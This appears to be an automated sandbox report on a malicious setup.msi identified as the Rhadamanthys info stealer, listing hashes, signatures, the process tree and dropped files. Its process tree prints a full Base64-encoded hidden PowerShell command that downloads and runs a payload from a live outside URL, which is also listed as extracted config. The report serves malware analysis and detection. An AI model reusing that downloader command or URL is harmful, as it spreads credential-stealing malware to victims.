Analysis
-
max time kernel
93s -
max time network
99s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
-
submitted
16-06-2024 01:15
General
-
Target
__x64___setup___x32__/setup.msi
-
Size
24.5MB
-
MD5
0bd85ea206276e8e5d6ea143c5cb8330
-
SHA1
75079d986324ff1d4150bf00fd10ea73f43d0a76
-
SHA256
8bd23057abb6865b761ae9719ea6a66ce97d70225abab2d7b2ddce84e35ca602
-
SHA512
6ac02552c727394ed9036d5015f8a6652619f9fab7ac8e06ccf5bb301580143e4c24477722cfa8ac7e5082b298e3d8ee72b04a14fbe9ee454a120ba58baf0192
-
SSDEEP
786432:zDMcQi4FgSUZGaQ5MHnPa4lJQJU8P8uBsTaxsn:zDMQ4KMaQqvu04On
Malware Config
Extracted
https://opensun.monster/25053.bs64
Signatures
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
Blocklisted process makes network request 3 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
-
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Suspicious use of SetThreadContext 1 IoCs
-
Drops file in Windows directory 14 IoCs
-
Executes dropped EXE 2 IoCs
-
Loads dropped DLL 8 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 14 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 2 IoCs
-
Suspicious use of WriteProcessMemory 21 IoCs
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\msiexec.exemsiexec.exe /I C:\Users\Admin\AppData\Local\Temp\__x64___setup___x32__\setup.msi1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 06168E8D4E4EDE6607CBB7EB7F8485A32⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss4038.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi4035.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr4036.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr4037.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\Jikas Corp Ko\MobiuQus\UnRAR.exe"C:\Users\Admin\AppData\Roaming\Jikas Corp Ko\MobiuQus\UnRAR.exe" x -p79d20ea766e8 "C:\Users\Admin\AppData\Roaming\Jikas Corp Ko\MobiuQus\ruw9eigh.rar" "C:\Users\Admin\AppData\Roaming\Jikas Corp Ko\MobiuQus\"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Jikas Corp Ko\MobiuQus\steamerrorreporter64.exe"C:\Users\Admin\AppData\Roaming\Jikas Corp Ko\MobiuQus\steamerrorreporter64.exe"2⤵
- Suspicious use of SetThreadContext
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe explorer.exe3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -e JAB3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7ACQAYgBzAD0AJAB3AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwAHMAOgAvAC8AbwBwAGUAbgBzAHUAbgAuAG0AbwBuAHMAdABlAHIALwAyADUAMAA1ADMALgBiAHMANgA0ACIAKQA7AFsAQgB5AHQAZQBbAF0AXQAgACQAeAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHMALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAiAGIAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAQAAiACwAIgBoACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACQAIgAsACIAbQAiACkALgBSAGUAcABsAGEAYwBlACgAIgAlACIALAAiAHAAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAXgAiACwAIgB2ACIAKQApADsAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAHgALgBDAG8AdQBuAHQAOwAkAGkAKwArACkAewAkAHgAWwAkAGkAXQA9ACAAKAAkAHgAWwAkAGkAXQAgAC0AYgB4AG8AcgAgADEANgA3ACkAIAAtAGIAeABvAHIAIAAxADgAfQA7AGkAZQB4ACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAB4ACkAKQA=4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2220 -s 18204⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2220 -s 17884⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2220 -s 17764⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2220 -ip 22201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2220 -ip 22201⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2220 -ip 22201⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Config.Msi\e573c7f.rbsFilesize
21KB
MD592f73678fc74479db78db8aa60a32822
SHA18cc9a2c9f4bf20262946772b0b636916295d5564
SHA2561200fb5918a16d2c6b32148f5eabd00fc142bb6db711e054d7e9df34fd17c814
SHA51295d71ddea096354d77338d03b899caeb0382f1dfe9c26394bc9e0d7bb48c1cc9003a3b9f7c644b075cb3217f9c3c14caca4553214ba885f9ae8e40dfc49c6a9b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
18KB
MD51dace4476d706ac2f1c6fd47065ead21
SHA1a9703429db7cfeef5ba6df83855559c81a01f66d
SHA256decbf2f411446508514adb974824c897a9dd6088e1055f83a15ba54abddc604f
SHA5128732549cb521999ddb63c3b8d2ccc5020e6be363df7f4a4aca4a4bf6ad9d49c032433a2ad086ae91334b0c5e157f35e8371b973e416d59719021724d096d5468
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tqgcwtic.fhw.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\msi4035.txtFilesize
136B
MD561272a4ab9bf0a6ea76e28f2513726fa
SHA16027604a6bb09956c4b2d48a2d35470bfe86e39d
SHA2561f432cbf91eda4097555450de475e90ea135477655bd33ef12609be369ba4754
SHA512e309cd5c70df6303ac2c9528e487e01333504232fe8fc2d7bb0df1c5528fc2a5f5a6ce71bbd1ccffd727055dfb27019116f06b51945d34d72e2060563a480c17
-
C:\Users\Admin\AppData\Local\Temp\pss4038.ps1Filesize
6KB
MD530c30ef2cb47e35101d13402b5661179
SHA125696b2aab86a9233f19017539e2dd83b2f75d4e
SHA25653094df6fa4e57a3265ff04bc1e970c10bcdb3d4094ad6dd610c05b7a8b79e0f
SHA512882be2768138bb75ff7dde7d5ca4c2e024699398baacd0ce1d4619902402e054297e4f464d8cb3c22b2f35d3dabc408122c207facad64ec8014f2c54834cf458
-
C:\Users\Admin\AppData\Local\Temp\scr4036.ps1Filesize
682B
MD5b32210f90a3fbfd1ef15caee45ebc871
SHA191deac74edcf1e6b4c3a81fa322ac76867075c62
SHA256c2aaabc2c09034d97d1ee67d912f25fe5f966539ea19624f062ece0a5aad606b
SHA5127b86aaa400b9f3b73720e99d1ae2f7ef3c4f23a7076b33545cdce6b34a003323fa05203193b1127f0bf25d718fe8d4f81ab282df04ba433dc1219e3f9ba4698b
-
C:\Users\Admin\AppData\Roaming\Jikas Corp Ko\MobiuQus\UnRAR.exeFilesize
494KB
MD598ccd44353f7bc5bad1bc6ba9ae0cd68
SHA176a4e5bf8d298800c886d29f85ee629e7726052d
SHA256e51021f6cb20efbd2169f2a2da10ce1abca58b4f5f30fbf4bae931e4ecaac99b
SHA512d6e8146a1055a59cba5e2aaf47f6cb184acdbe28e42ec3daebf1961a91cec5904554d9d433ebf943dd3639c239ef11560fa49f00e1cff02e11cd8d3506c4125f
-
C:\Users\Admin\AppData\Roaming\Jikas Corp Ko\MobiuQus\ruw9eigh.rarFilesize
382KB
MD5128b722e0ebb178c36611aebe02999bf
SHA1c5ac682b02a65f0bc8db41d18e0ec446ee8df2fd
SHA256ea63d053a4c92c389105ede63d11baca8158a62ec4fb684d12ea3087118e405e
SHA512e5e3877a7fda5f4b9129e036d63afd31ac1cad8daa2fb5226fb5df472432aa9dab2f2c4547450354f0e34a7d6f6e09ccbc4d7733b29f31b67c75b1a7c73e40af
-
C:\Users\Admin\AppData\Roaming\Jikas Corp Ko\MobiuQus\steamerrorreporter64.exeFilesize
639KB
MD5fd3ce044ac234fdab3df9d7f492c470a
SHA1a74a287d5d82a8071ab36c72b2786342d83a8ef7
SHA2560a0c09753b5103e86e32c2d8086dd1399f0d97a00e1525ec9c390067cdb242ba
SHA51286d7e805fab0e5130003facbb1525ee261440846f342f53ae64c3f8d676d1208d5fd9bd91e3222c63cc30c443348eb5ddedab14c8847dae138fba7e9be69d08d
-
C:\Users\Admin\AppData\Roaming\Jikas Corp Ko\MobiuQus\tier0_s64.dllFilesize
386KB
MD57e60404cfb232a1d3708a9892d020e84
SHA131328d887bee17641608252fb2f9cd6caf8ba522
SHA2565a3e15cb90baf4b3ebe0621fa6f5f37b0fe99848387d6f2fd99ae770d1e6d766
SHA5124d8abd59bd77bdb6e5b5e5f902d2a10fa5136437c51727783e79aed6a796f9ee1807faf14f1a72a1341b9f868f61de8c676b00a4b07a2a26cfb8a4db1b77eb3c
-
C:\Users\Admin\AppData\Roaming\Jikas Corp Ko\MobiuQus\vstdlib_s64.dllFilesize
1023KB
MD51e03adffd3912b6e3e8a4969fa7eeb26
SHA1012f2578ff5800c3fc7972843bb99a851a2f03d0
SHA256edcff29d4eed320bcd710db9426be3b39223752fa8de4dafcfd3c5fbda24ea5f
SHA51296ccb3e1095b99918ea6279405538882f3658293452292fc4a3272c6cee284fa0cc52ec4325690cc27046ca8faf4c98a94e31066a25aff526eb93d5a7baf71be
-
C:\Windows\Installer\MSI3D18.tmpFilesize
738KB
MD5b158d8d605571ea47a238df5ab43dfaa
SHA1bb91ae1f2f7142b9099e3cc285f4f5b84de568e4
SHA256ca763693cc25d316f14a9ebad80ebf00590329550c45adb7e5205486533c2504
SHA51256aef59c198acf2fcd0d95ea6e32ce1c706e5098a0800feff13ddb427bfb4d538de1c415a5cb5496b09a5825155e3abb1c13c8c37dc31549604bd4d63cb70591
-
C:\Windows\Installer\MSI3F40.tmpFilesize
758KB
MD5fb4665320c9da54598321c59cc5ed623
SHA189e87b3cc569edd26b5805244cfacb2f9c892bc7
SHA2569fb3156c665211a0081b189142c1d1ab18cda601ee54d5f5d8883ecfa4177a59
SHA512b205552a3cfbaa2202e6ef7e39e229af167b2342a7dc4a2f4cadfe4d05000966cf19e9e208e44d6bb0fd6a56f4283caeed9c13f523e5b301b87f79febb1840cf
-
C:\Windows\Installer\e573c7c.msiFilesize
24.5MB
MD50bd85ea206276e8e5d6ea143c5cb8330
SHA175079d986324ff1d4150bf00fd10ea73f43d0a76
SHA2568bd23057abb6865b761ae9719ea6a66ce97d70225abab2d7b2ddce84e35ca602
SHA5126ac02552c727394ed9036d5015f8a6652619f9fab7ac8e06ccf5bb301580143e4c24477722cfa8ac7e5082b298e3d8ee72b04a14fbe9ee454a120ba58baf0192
-
memory/2220-199-0x0000000004590000-0x0000000004990000-memory.dmpFilesize
4.0MB
-
memory/2220-200-0x0000000004590000-0x0000000004990000-memory.dmpFilesize
4.0MB
-
memory/2220-203-0x00000000760F0000-0x0000000076305000-memory.dmpFilesize
2.1MB
-
memory/2220-201-0x00007FFDBA9D0000-0x00007FFDBABC5000-memory.dmpFilesize
2.0MB
-
memory/2220-174-0x0000000000270000-0x0000000000298000-memory.dmpFilesize
160KB
-
memory/2220-172-0x0000000000270000-0x0000000000298000-memory.dmpFilesize
160KB
-
memory/2220-173-0x0000000000270000-0x0000000000298000-memory.dmpFilesize
160KB
-
memory/3716-168-0x000001ED15210000-0x000001ED15211000-memory.dmpFilesize
4KB
-
memory/4080-32-0x00000000058F0000-0x0000000005956000-memory.dmpFilesize
408KB
-
memory/4080-50-0x0000000007F30000-0x00000000084D4000-memory.dmpFilesize
5.6MB
-
memory/4080-28-0x0000000002980000-0x00000000029B6000-memory.dmpFilesize
216KB
-
memory/4080-44-0x0000000005FE0000-0x000000000602C000-memory.dmpFilesize
304KB
-
memory/4080-43-0x0000000005F50000-0x0000000005F6E000-memory.dmpFilesize
120KB
-
memory/4080-47-0x00000000064B0000-0x00000000064CA000-memory.dmpFilesize
104KB
-
memory/4080-42-0x0000000005960000-0x0000000005CB4000-memory.dmpFilesize
3.3MB
-
memory/4080-29-0x0000000005120000-0x0000000005748000-memory.dmpFilesize
6.2MB
-
memory/4080-53-0x0000000008BE0000-0x000000000910C000-memory.dmpFilesize
5.2MB
-
memory/4080-46-0x00000000078B0000-0x0000000007F2A000-memory.dmpFilesize
6.5MB
-
memory/4080-30-0x0000000004F90000-0x0000000004FB2000-memory.dmpFilesize
136KB
-
memory/4080-48-0x0000000007230000-0x00000000072C6000-memory.dmpFilesize
600KB
-
memory/4080-52-0x00000000084E0000-0x00000000086A2000-memory.dmpFilesize
1.8MB
-
memory/4080-31-0x0000000005880000-0x00000000058E6000-memory.dmpFilesize
408KB
-
memory/4080-49-0x0000000006540000-0x0000000006562000-memory.dmpFilesize
136KB
-
memory/4332-235-0x000001A5750D0000-0x000001A5755F8000-memory.dmpFilesize
5.2MB
-
memory/4332-198-0x000001A5747A0000-0x000001A5747BC000-memory.dmpFilesize
112KB
-
memory/4332-234-0x000001A5749D0000-0x000001A574B92000-memory.dmpFilesize
1.8MB
-
memory/4332-185-0x000001A5743F0000-0x000001A574412000-memory.dmpFilesize
136KB
-
memory/5104-204-0x0000000000D30000-0x0000000000D39000-memory.dmpFilesize
36KB
-
memory/5104-209-0x00000000760F0000-0x0000000076305000-memory.dmpFilesize
2.1MB
-
memory/5104-207-0x00007FFDBA9D0000-0x00007FFDBABC5000-memory.dmpFilesize
2.0MB
-
memory/5104-206-0x0000000002B70000-0x0000000002F70000-memory.dmpFilesize
4.0MB